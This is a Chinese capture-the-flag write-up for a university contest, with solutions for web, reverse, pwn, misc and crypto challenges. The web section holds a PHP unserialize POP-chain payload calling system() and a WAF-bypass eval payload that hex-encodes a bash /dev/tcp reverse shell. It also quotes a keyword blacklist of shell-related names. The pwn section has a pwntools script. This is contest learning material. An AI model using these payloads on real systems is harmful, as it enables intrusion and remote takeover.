浙江工商大学校赛

web

PHP签到

<?php
highlight_file(__FILE__);
ini_get('open_basedir');

class yiyi{
    public $Do;
    public $You;
    public $love;
    public $web;
    public function __invoke()
    {
        echo "迈进新手村了，接下来往哪走呢"."<br>";
        eval($this->web);
    }
    public function __wakeup()
    {
        $this->web=$this->love;
    }
    public function __destruct()
    {
        die($this->You->execurise=$this->Do);
    }

}

class whoami{
    private $execurise;
    public $lead;
    public $hansome;
    public function __set($name,$value)
    {
        echo $this->lead;
    }
    public function __get($args)
    {
        if(is_readable("/flag")){
            echo file_get_contents("/flag");
        }
        else{
            echo "签到也不带这么签的啊"."<br>";
            if ($this->execurise=="man!") {
                echo "胜利就在眼前"."<br>";
                if(isset($this->hansome->lover)){
                    phpinfo();
                }
            }
            else{
                echo($this->execurise);
                echo "搞什么啊，别犯困"."<br>";
            }
        }
    }
}

class ZJGSU{
    public $girl;
    public $friend;
    public function __toString()
    {
        return "心中有信仰，脚下有力量"."<br>".$this->girl->abc;
    }
    public function __call($args1,$args2)
    {
        $func=$this->friend;
        $func();
    }

}
class ZJPC{
    private $lover;
    public  $forever;
    public function __isset($args){
        return $this->forever->nononon();
    }

}


$web=$_GET['web'];
if (isset($web)) {
    unserialize(base64_decode($web));
    throw new Exception("None");
}else{
    echo("你真的是学web的么");
}

yiyi->destruct
whoami->set
ZJGSU->tostring
whoami->get
zjpc->isset
yiyi->invoke

$web=new yiyi();
$web->You=new whoami();
$web->You->lead=new ZJGSU();
$web->You->lead->girl=new whoami();
$web->You->lead->girl->execurise="man!";
$web->You->lead->girl->hansome=new ZJPC();
$web->You->lead->girl->hansome->lover=1;
$web->You->lead->girl->hansome->forever=new ZJGSU();
$web->You->lead->girl->hansome->forever->friend=new yiyi();
$web->You->lead->girl->hansome->forever->friend->love="system('cat /maybe_1_am_flag');";
$web->You->lead->girl->hansome->forever->friend->web="system('ls');";

POP链构造，

calc++

def waf(s):
    blacklist = ['import','(',')','#','@','^','$',',','>','?','`',' ','_','|',';','"','{','}','&','getattr','os','system','class','subclasses','mro','request','args','eval','if','subprocess','file','open','popen','builtins','compile','execfile','from_pyfile','config','local','self','item','getitem','getattribute','func_globals','__init__','join','__dict__', '\\x']
    flag = True
    for no in blacklist:
        if no.lower() in s.lower():
            flag= False
            print(no)
            break
    return flag
    

@app.route("/")
def index():
    "我算啊算 算不到那个天命的女孩..."
    return render_template("index.html")

@app.route("/source")
def source():
    src = """
    @app.route("/calc",methods=['GET'])
def calc():
    ip = request.remote_addr
    num = request.values.get("num")
    log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip)
    
    if waf(num):
        try:
            data = eval(num)
            os.system(log)
        except:
            pass
        return str(data)
    else:
        return "waf!!"
    """
    return src

@app.route("/calc",methods=['GET'])
def calc():
    ip = request.remote_addr
    num = request.values.get("num")
    log = "echo {0} {1}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip)
    
    if waf(num):
        try:
            data = eval(num)
            os.system(log)
        except:
            pass
        return str(data)
    else:
        return "waf!!"

发现eval了我们传入的num值，根据提示给定保姆级教程，我们得到了payload例子

[[str][0]for[ᵒｓ.environ['BASH\x5fFUNC\x5fecho%%']]in[['\x28\x29\x20\x7b\x20\x62\x61\x73\x68\x20\x2d\x69\x20\x3e\x26\x20\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x78\x27\x78\x27\x78\x27\x78\x27\x78\x27\x78\x2f\x34\x34\x34\x34\x20\x30\x3e\x26\x31\x3b\x7d']]]

但是发现\x被waf挡住了，所以这里用unicode绕过即可，然后就是shell反弹

RE

逆向的本质

}detacitsihpos_3b_ot_tub_llik_dn@_thg1f_ot_ton_s1_esrever_f0_ecn3sse_ehT{galf

逆向即可

Unpack

魔改的UPX，更改UPX的标志位

IDA得到一个字节组

然后根据算法逆向

tmp=[0x6D,0x68,0x64,0x69,0x70,0x51,0x75,0x76,0x54,0x35,0x76,0x51,0x65,0x34,0x71,0x51,0x6F,0x35,0x63,0x68,0x62,0x67,0x70,0x62,0x7F,0x79,0x0,0x0,0xB,0x4,0x5,0x0E]
flag=""
tmp1=""

for i in range(26):
    tmp1=tmp[i]^tmp[i%4+28]
    print(chr(tmp1),end="")

得到flag

PWN

math_game

简单的PWNTOOL利用

from pwn import *
context(arch='amd64',os='linux',log_level='debug')

io = remote('124.221.156.93',32936)
 
io.recvuntil("challenge.\n")
io.sendline("")

data = io.recvuntil(delims=b"=",timeout=5)
data = data[:-1].decode()
data = data.replace('/', '//')
data = data.replace(' ', '')
data = data.replace('\n', '')
print("接受到了",data)
a = eval(data)
print("运算后",a)
io.sendline(str(a))
io.recvuntil("shell...\n")
io.sendline("cat flag")
io.recvall()

Misc

Maze Hunter

跟着顺序一个一个找就行了

密码学

密码是什么？可以拿来吃嘛🤓

import base64

symbols = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567"
flag=["abbaa","bbaab","babba","aabba","aaaba","bbaab","bbabb","bbabb","bbbab","aabba","aaaab","bbabb","bbabb","bbaab","aabab","bbaaa","baaab","babbb","baabb","bbaab","baabb","abbbb","abbbb","aabba","baabb","babba","baaba","babab","bbbbb","bbaab","aabab","bbaaa","baaab","babbb","babaa","bbaaa","aabbb","abbbb","abbbb","aabba","baabb","babba","baaba","bbbba","abbbb","aabba","abbab","bbbab","abbbb","babaa"]

codes = [format(i, '05b').replace('0','a').replace('1','b') for i in range(32)]
print(codes)
enc_map = dict(zip(symbols, codes))
dec_map = {code: sym for sym, code in enc_map.items()}
print(dec_map)
for i in flag:
    print(dec_map[i],end="")

五个字符一组，根据解密map得到base32字符串，解密即可